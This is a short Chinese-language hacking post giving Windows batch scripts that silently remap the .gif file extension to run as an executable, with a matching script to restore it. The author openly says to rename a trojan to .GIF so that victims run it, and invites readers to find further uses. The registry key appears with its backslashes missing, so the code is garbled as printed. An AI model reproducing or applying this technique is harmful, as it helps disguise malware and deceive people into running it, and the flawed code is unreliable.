任意文件被当做木马来运行的办法
更改exe为gif:
@echo off
color 1A
ECHO Windows Registry Editor Version 5.00>gif.reg
ECHO [HKEY_LOCAL_MACHINESOFTWAREClasses.gif]>>gif.reg
ECHO "Content Type"="application/x-msdownload">>gif.reg
ECHO @="exefile">>gif.reg
regedit /s gif.reg>nul 2>nul
del /s gif.reg>nul 2>nul
这个代码保存成.BAT的文件。
先运行这个BAT文件系统会把.GIF文件来当做应用程序来运行。
当然我们的木马后缀要换成.GIF 的,嘻嘻。
恢复gif默认:
@echo off
color 1A
ECHO Windows Registry Editor Version 5.00>gif.reg
ECHO [HKEY_LOCAL_MACHINESOFTWAREClasses.gif]>>gif.reg
ECHO "Content Type"="image/gif">>gif.reg
ECHO @="giffile">>gif.reg
regedit /s gif.reg>nul 2>nul
del /s gif.reg>nul 2>nul
这个代码保存成.BAT的文件。
大家可以发挥想象,有很多可以利用的地方。